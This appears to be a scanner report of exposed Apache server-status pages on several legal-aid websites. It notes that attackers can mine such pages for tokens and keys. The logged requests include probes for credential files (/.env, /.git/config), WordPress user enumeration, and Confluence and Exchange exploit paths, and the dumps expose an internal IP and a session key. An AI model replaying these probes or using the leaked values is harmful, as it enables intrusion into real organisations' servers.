70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 6-92111450/111/223979_ 8.75000.04.8410562.76 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-92120560/12/216027_ 0.90000.00.1310106.08 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-92116180/80/207389_ 4.38000.03.589424.49 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 9-92111550/135/196833_ 10.88000.04.519262.61 70.132.60.147http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 10-92119283/33/183425K 2.60303.50.788455.33 70.132.1.80http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 11-92121792/2/164360K 0.00002.70.007891.88 70.132.1.80http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 12-92121841/1/158049K 0.00401.00.007066.26 70.132.1.81http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 13-92119430/30/153075_ 2.36200.01.187022.61 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 14-92121892/2/142078K 0.00002.30.006207.61 70.132.1.80http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 15-92116400/62/121083_ 5.48000.02.115772.47 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 16-92121981/1/107508W 0.00001.10.005179.73 70.132.1.80http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 17-92121991/1/92549K 0.00301.00.004262.08 70.132.1.80http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 18-92122041/1/81011K 0.00311.60.003482.26 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 19-92122091/1/79013K 0.00301.00.003620.23 70.132.1.80http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 20-92122142/2/77289K 0.00202.00.003566.67 70.132.60.147http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 21-92119740/30/74259_ 2.68200.00.323257.78 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 22-92122192/2/70339K 0.00202.00.003161.91 130.176.179.52http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 23-92122201/1/66666K 0.00311.50.002933.52 130.176.137.155http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-92122251/1/57309K 0.00301.10.002564.05 130.176.179.52http/1.1picturingjustice.org:8080GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 25-92122381/1/24578K 0.002040.70.041165.23 130.176.179.52http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 26-92122391/1/18934K 0.00201.10.00848.13 70.132.60.147http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 27-92122441/1/19666K 0.00201.00.00900.02 130.176.179.52http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 28-92122491/1/16955K 0.00211.60.00915.17 130.176.179.52http/1.1picturingjustice.org:8080GET / HTTP/1.1 29-92-0/0/16250. 0.00000.00.00836.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-92122591/1/18130C 0.00000.20.00736.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-92122641/1/16361K 0.040824.90.00783.79 64.252.190.75http/1.1gwinnettfamilylawclinic.org:808GET /wp-login.php HTTP/1.1 32-92122680/0/14844W 0.00000.00.00681.32 64.252.190.75http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 33-92122710/0/16373_ 0.00200.00.00735.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-92122750/0/15954_ 0.00200.00.00756.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-92122800/0/16362_ 0.00200.00.00875.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-92122850/0/14649_ 4.26200.00.00644.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-92122900/0/14861_ 0.00200.00.00641.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-92122950/0/15343_ 2.95200.00.00663.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-92123000/0/15716_ 0.00200.00.00657.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-92123050/0/13792_ 4.68200.00.00631.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-91-0/0/3731. 0.009896200.00.00138.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-91-0/0/2032. 0.009896100.00.0095.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-91-0/0/2110. 3.7312022500.00.0079.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-91-0/0/1440. 0.4112077900.00.0061.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-91-0/0/1566. 0.0012080200.00.0061.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-91-0/0/962. 0.0012078100.00.0038.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-91-0/0/943. 0.0012080300.00.0031.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-91-0/0/864. 0.0012080100.00.0042.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-91-0/0/1573. 0.1512078000.00.0042.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-90-0/0/987. 0.2816673300.00.00105.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-90-0/0/1149. 0.2616674000.00.0056.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-90-0/0/1038. 0.1616674900.00.0049.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-90-0/0/1045. 0.2816673500.00.0044.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-90-0/0/1009. 0.3116672400.00.0049.08 ::1http/1.1atlantalegalaid.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979bfaadbe1
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:04:35 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 51 minutes 48 seconds Server load: 0.15 0.04 0.01 Total accesses: 4334506 - Total Traffic: 195.9 GB CPU Usage: u102.3 s10.4 cu0 cs0 - .00142% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 26 requests currently being processed, 13 idle workers ___KKK____KK__K_KKKKK_KKKKKKK..KKKKWCKK__....................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92121630/2/276494_ 0.00100.00.0013137.88 70.132.1.80http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 1-92120410/12/270920_ 0.30300.00.1612701.83 70.132.1.81http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-92121680/2/266311_ 0.00100.00.0012755.69 70.132.1.80http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 3-92121693/3/252874K 0.00007.20.0111597.37 70.132.1.80http/1.1picturingjustice.org:8080GET /s/3134332e3230342e38392e3932/_/;/META-INF/maven/com.atlass 4-92119276/41/245953K 2.970011.21.2311161.77 70.132.1.80http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 5-92121783/3/236731K 0.00003.90.0010921.63 70.132.1.80http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 6-92111450/111/223979_ 8.75000.04.8410562.76 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-92120560/12/216027_ 0.90100.00.1310106.08 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-92116180/80/207389_ 4.38100.03.589424.49 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 9-92111550/135/196833_ 10.88100.04.519262.61 70.132.60.147http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 10-92119284/34/183426K 2.60004.80.788455.33 70.132.1.80http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 11-92121792/2/164360K 0.00002.70.007891.88 70.132.1.80http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 12-92121840/1/158049_ 0.00000.00.007066.26 70.132.1.81http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 13-92119430/30/153075_ 2.36300.01.187022.61 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 14-92121892/2/142078K 0.00002.30.006207.61 70.132.1.80http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 15-92116400/62/121083_ 5.48100.02.115772.47 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 16-92121982/2/107509K 0.00016.40.015179.74 70.132.1.80http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 17-92121992/2/92550K 0.00002.00.004262.08 70.132.1.80http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 18-92122042/2/81012K 0.00002.60.003482.26 70.132.1.80http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 19-92122092/2/79014K 0.00012.60.003620.24 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 20-92122142/2/77289K 0.00302.00.003566.67 70.132.60.147http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 21-92119740/30/74259_ 2.68300.00.323257.78 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 22-92122192/2/70339K 0.00302.00.003161.91 130.176.179.52http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 23-92122201/1/66666K 0.00411.50.002933.52 130.176.137.155http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-92122251/1/57309K 0.00401.10.002564.05 130.176.179.52http/1.1picturingjustice.org:8080GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 25-92122381/1/24578K 0.003040.70.041165.23 130.176.179.52http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 26-92122391/1/18934K 0.00301.10.00848.13 70.132.60.147http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 27-92122441/1/19666K 0.00301.00.00900.02 130.176.179.52http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 28-92122491/1/16955K 0.00311.60.00915.17 130.176.179.52http/1.1picturingjustice.org:8080GET / HTTP/1.1 29-92-0/0/16250. 0.00100.00.00836.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-92-0/0/18130. 0.00000.00.00736.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-92122641/1/16361K 0.041824.90.00783.79 64.252.190.75http/1.1gwinnettfamilylawclinic.org:808GET /wp-login.php HTTP/1.1 32-92122681/1/14845K 0.030735.20.01681.33 64.252.190.75http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 33-92122712/2/16375K 0.00012.60.00735.59 70.132.1.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 34-92122752/2/15956K 0.00002.20.00756.40 70.132.1.80http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 35-92122801/1/16363W 0.00001.60.00875.91 70.132.1.80http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 36-92122851/1/14650C 0.00000.20.00644.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-92122901/1/14862K 0.00001.00.00641.47 70.132.1.80http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 38-92122951/1/15344K 0.00001.00.00663.06 70.132.1.80http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 39-92123000/1/15717_ 0.060950.00.00657.97 70.132.62.150http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 40-92123050/0/13792_ 4.68300.00.00631.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-91-0/0/3731. 0.009896300.00.00138.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-91-0/0/2032. 0.009896200.00.0095.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-91-0/0/2110. 3.7312022500.00.0079.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-91-0/0/1440. 0.4112078000.00.0061.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-91-0/0/1566. 0.0012080300.00.0061.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-91-0/0/962. 0.0012078200.00.0038.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-91-0/0/943. 0.0012080400.00.0031.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-91-0/0/864. 0.0012080200.00.0042.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-91-0/0/1573. 0.1512078100.00.0042.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-90-0/0/987. 0.2816673400.00.00105.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-90-0/0/1149. 0.2616674100.00.0056.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-90-0/0/1038. 0.1616675000.00.0049.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-90-0/0/1045. 0.2816673600.00.0044.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-90-0/0/1009
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed1b3c4f4e
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 09-Jan-2026 20:58:31 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 45 days 4 hours 21 minutes 40 seconds Server load: 0.00 0.00 0.00 Total accesses: 43506 - Total Traffic: 1.7 GB CPU Usage: u33.41 s2.71 cu0 cs0 - .000925% CPU load .0111 requests/sec - 473 B/second - 41.5 kB/request 1 requests currently being processed, 9 idle workers W_..______..__.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-451821919/74/3358W 3.330022.51.19136.76 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 1-45183390/34/3627_ 3.1625684900.01.47149.23 112.46.213.94http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-45-0/0/3438. 2.291135500.00.00139.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-45-0/0/3565. 0.001135400.00.00143.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-45179090/62/3199_ 5.45207500.01.63134.56 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-45179190/24/2980_ 2.04177100.00.68135.36 164.68.124.154http/1.1atlantalegalaid.org:8080GET /001565000000.cfg HTTP/1.1 6-45211550/19/3526_ 2.32124200.00.88144.63 45.91.64.6http/1.1atlantalegalaid.org:8080GET /server-status HTTP/1.1 7-45179200/26/3296_ 2.36333840.010.24130.40 18.68.41.16http/1.1elearning.alas.org:8080GET /lib/javascript.php?file=%2F1763499490%2Flib/jquery/jquery- 8-45179210/48/2972_ 3.223695620.00.77118.43 130.176.208.182http/1.1intranet.atlantalegalaid.org:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 9-45211600/17/2547_ 1.99333810.00.86106.48 18.68.41.6http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?3.17.2/event-mousewheel/event-mousewhe 10-45-0/0/2492. 0.001135300.00.00100.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-45-0/0/2400. 0.001135200.00.0099.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-45179100/84/2105_ 1.62333880.01.2478.89 18.68.41.39http/1.1elearning.alas.org:8080POST /lib/ajax/service.php?sesskey=s37rDy8GOt&info=core_fetch_n 13-45217810/8/993_ 0.27333910.00.9736.09 18.68.41.39http/1.1elearning.alas.org:8080GET /lib/javascript.php?rev=1763499490&jsfile=%2Flib%2Frequirej 14-44-0/0/1161. 1.385443800.00.0040.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-43-0/0/552. 4.091388092300.00.0015.29 15.158.22.110http/1.1atlantalegalaid.org:8080GET /galex.php HTTP/1.1 16-43-0/0/609. 2.6013916800.00.0031.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-43-0/0/273. 0.0019232200.00.009.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-43-0/0/116. 0.0019232100.00.000.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-43-0/0/24. 0.0019232000.00.000.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-43-0/0/42. 0.0019231900.00.001.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-42-0/0/43. 0.0022749200.00.001.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-42-0/0/43. 0.0022749300.00.001.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-42-0/0/26. 0.0022749500.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-42-0/0/119. 0.0022749100.00.005.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed1e5aacd9
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 02-Jan-2026 16:32:12 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 39 Parent Server MPM Generation: 38 Server uptime: 37 days 23 hours 55 minutes 21 seconds Server load: 0.00 0.00 0.00 Total accesses: 37070 - Total Traffic: 1.4 GB CPU Usage: u44.11 s3.34 cu0 cs0 - .00145% CPU load .0113 requests/sec - 466 B/second - 40.4 kB/request 1 requests currently being processed, 9 idle workers ._____W_._.__................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-38-0/0/2826. 0.42532900.00.00114.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-38297660/102/3118_ 3.86246500.03.17124.23 15.158.254.200http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-38321880/17/2975_ 2.66413900.01.05116.90 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-38323280/40/3023_ 0.744710420.00.34119.20 3.172.5.6http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 4-38311020/19/2753_ 2.62258000.00.99115.89 54.174.234.236http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-38297650/66/2543_ 5.38506100.01.82115.72 45.156.87.74http/1.1atlantalegalaid.org:8080CONNECT www.google.com:443 HTTP/1.1 6-383017625/67/3015W 6.380029.92.52122.24 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 7-38297750/49/2757_ 6.83318900.02.6997.57 3.172.22.164http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 8-38-0/0/2508. 1.15532800.00.0097.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-38323330/2/2178_ 0.18506100.00.0780.40 45.156.87.74http/1.1atlantalegalaid.org:8080CONNECT www.cloudflare.com:443 HTTP/1.1 10-38-0/0/2146. 0.29764000.00.0084.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-38301860/74/2010_ 5.524751480.02.1878.94 3.172.5.6http/1.1elearning.alas.org:8080GET / HTTP/1.1 12-38321930/11/1752_ 1.6661600.00.6666.35 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-38-0/0/764. 0.00764100.00.0026.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-37-0/0/1088. 0.006045400.00.0037.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-37-0/0/498. 0.006045300.00.0013.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-37-0/0/566. 2.423970600.00.0029.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-35-0/0/250. 3.4221513100.00.008.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-35-0/0/12. 0.0025273100.00.000.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-35-0/0/21. 0.0025273000.00.000.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-35-0/0/40. 2.8922670800.00.001.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-35-0/0/42. 0.0025272900.00.001.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-35-0/0/42. 0.0025272700.00.001.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-35-0/0/25. 0.0025272800.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-35-0/0/118. 1.0323864300.00.005.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed27994938
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 26-Dec-2025 23:38:25 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 32 Parent Server MPM Generation: 31 Server uptime: 31 days 7 hours 1 minute 34 seconds Server load: 0.00 0.00 0.00 Total accesses: 29752 - Total Traffic: 1.1 GB CPU Usage: u65.33 s4.95 cu0 cs0 - .0026% CPU load .011 requests/sec - 445 B/second - 39.6 kB/request 1 requests currently being processed, 9 idle workers .____.W___.__................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-31-0/0/2355. 0.51655900.00.0095.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-3186100/125/2472_ 6.98414100.03.6397.02 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-3183460/59/2410_ 7.36505390.02.6582.44 15.158.254.200http/1.1elearning.alas.org:8080GET /course/view.php?id=14 HTTP/1.1 3-31114700/59/2388_ 8.82150000.03.2498.70 141.98.11.140http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-31128970/6/2204_ 0.69197800.00.2093.67 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-31-0/0/1995. 1.08655800.00.0093.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-31928425/136/2417W 5.580029.92.0698.89 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 7-3183470/78/2171_ 6.0765602190.01.8074.83 130.176.212.53http/1.1atlantalegalaid.org:8080GET /x.php HTTP/1.1 8-3192890/52/2085_ 6.8465632170.02.5470.33 130.176.212.15http/1.1atlantalegalaid.org:8080GET /wp-includes/rest-api/search/ HTTP/1.1 9-31114750/23/1777_ 2.7965602160.00.9363.49 130.176.212.14http/1.1atlantalegalaid.org:8080GET /yas.php HTTP/1.1 10-31-0/0/1799. 2.182437600.00.0068.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-31114800/49/1576_ 7.396841510.02.7162.20 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766791613.486093997955322 12-3183400/72/1436_ 9.086843950.03.2651.16 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-31-0/0/617. 2.73656200.00.0020.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-28-0/0/808. 2.182348041530.00.0030.64 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766553623.606631994247436 15-28-0/0/377. 0.0027028200.00.007.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-28-0/0/491. 0.0027028100.00.0026.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-28-0/0/175. 0.0027033300.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-28-0/0/7. 0.0027033200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-28-0/0/14. 0.0027033100.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00196537300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00196537200.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00196537100.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00196536900.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00196537000.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed3c73648c
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 25-Dec-2025 03:27:03 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 29 days 10 hours 50 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 27933 - Total Traffic: 1.1 GB CPU Usage: u61.7 s4.78 cu0 cs0 - .00261% CPU load .011 requests/sec - 444 B/second - 39.6 kB/request 7 requests currently being processed, 6 idle workers K__KKW_K__KK_................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, 